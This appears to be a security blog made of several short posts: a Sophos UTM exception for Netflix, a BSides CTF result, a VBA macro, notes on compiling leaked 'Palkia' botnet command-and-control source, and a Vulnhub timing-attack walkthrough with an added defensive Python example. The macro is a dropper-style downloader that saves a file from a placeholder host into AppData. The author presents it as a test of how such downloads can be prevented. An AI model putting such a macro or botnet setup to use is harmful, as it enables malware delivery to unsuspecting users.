*** This solution no longer works with updates that Sophos has applied or changes that Netflix has made!
I was helping a friend with a Sophos UTM and found that Netflix would not stream on their mobile devices. We went into the settings and, through studying the weblog and how Netflix URLs are put together, created the following regex to add an exception so the AV would not scan the URL:
Below is a screenshot of the exception that was created:
Now as long as the bot masters do not create a bot that uses that regex to exfil data it will work great!! Oh, by the way, the Sophos UTM is free for home use. It is a nice Unified Threat Management (UTM) for home use and is a lot better than a router you can buy out of the store.
At BSides 2016 I participated in their Hackers Challenge. The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out. When I had hit the wall at 3AM in the morning on March 11th, I was in 2nd place. By the end of the competition, which was at 10AM, I had dropped to 7th. The challenge was great! Thanks BSides...
Check out the django.nV project. This is a project that was used in the Hackers Challenge but was adapted from its original state.
Screenshot of being in 2nd place at 3AM.
Screenshot of being in 7th place at the end of the competition.
One thing to note is most of the challenges were worth 4,000 points in the beginning. If you did the challenge and no one else did, you kept the 4,000 points. For each participant that accomplished the challenge, you had to divide the points with them.
Below is a Visual Basic for Applications script I quickly built to download a file through a Macro to the computer. This was to test the capability of being able to do it and to find a way to prevent it from occurring.
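' vTest Macro
Sub vTest()
    Dim dURL As String
    dURL = "http://blah/text.zip"
    Dim WinHttpReq As Object
    Dim oStream As Object
    Dim fileName As String
    ' Destination path under the user's roaming profile
    fileName = Environ("AppData") & "\microsoft\text.zip"
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    ' Synchronous GET request
    WinHttpReq.Open "GET", dURL, False
    WinHttpReq.send
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1 ' adTypeBinary
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile fileName, 2 ' adSaveCreateOverWrite
        oStream.Close
    End If
End Sub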
Through the information gathered inside of the binaries I began searching for unique strings on Google. One of the unique strings that I searched for was "HTTPFLOOD GHP". This pulled back less than 10 results and the first one was from the site hxxp://psbdmp.com/wT1htV9b. This contained the source code for what they called "Palkia Server.c".
This particular piece of source code was found to have been leaked on 2016-11-12 09:58:05 according to the timestamp on the paste. I have not validated that the binary in which I found the string matches up with this particular CnC Server source code.
After looking at the source code, understanding the logic, and verifying there were no backdoors or other intents to infect my systems, I compiled the source code on a temporary server. Upon execution you need to specify which port it listens on for the bot connections and the number of threads it will utilize.
After you specify the port and the number of threads it begins to …
I was looking through the boot 2 root vulnerable images that they have on vulnhub.com and Pandora's box caught my eye. I wanted to follow and experiment with this timing attack described in the walkthrough done by strata. I am using code that resembles that used by strata.
To briefly describe what is occurring to gather the first password: you can connect on port 54311 and you are prompted for a password. strata determined through some testing that if you guessed the correct letter in the password it would return quicker than if you did not. I wanted to be able to see this so I created the following script:
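Added example (not the author's script or strata's code): a local model of the behaviour described above, in which a wrong character costs more work than a right one, next to a comparison that does the same work for every guess. `SECRET`, `PENALTY`, the cost counter and all function names are assumptions made for illustration; the code makes no network connection.

```python
import string

SECRET = "s3cr3t"   # constructed sample value, not from the challenge
PENALTY = 5         # assumed extra work units spent on a wrong character
ALPHABET = string.ascii_lowercase + string.digits


def leaky_check(guess, secret=SECRET):
    """Model of the described flaw: a right character returns quicker."""
    ok, cost = len(guess) == len(secret), 0
    for g, s in zip(guess, secret):
        if g == s:
            cost += 1            # fast path
        else:
            cost += PENALTY      # slow path, observable as a longer reply
            ok = False
    return ok, cost


def constant_check(guess, secret=SECRET):
    """Same work for every guess; real code should call hmac.compare_digest."""
    padded = guess.ljust(len(secret), "\0")[:len(secret)]
    diff, cost = len(guess) ^ len(secret), 0
    for g, s in zip(padded, secret):
        diff |= ord(g) ^ ord(s)  # no branch on whether the character matched
        cost += 1
    return diff == 0, cost


def audit(check, length):
    """Return what cost alone reveals per position ('?' when cost is flat)."""
    revealed = ""
    for pos in range(length):
        costs = {c: check("\0" * pos + c + "\0" * (length - pos - 1))[1]
                 for c in ALPHABET}
        flat = len(set(costs.values())) == 1
        revealed += "?" if flat else min(costs, key=costs.get)
    return revealed


if __name__ == "__main__":
    print("leaky   :", audit(leaky_check, len(SECRET)))
    print("constant:", audit(constant_check, len(SECRET)))
```

The `audit` helper doubles as a regression test: any password check whose cost varies with the guessed character fails it.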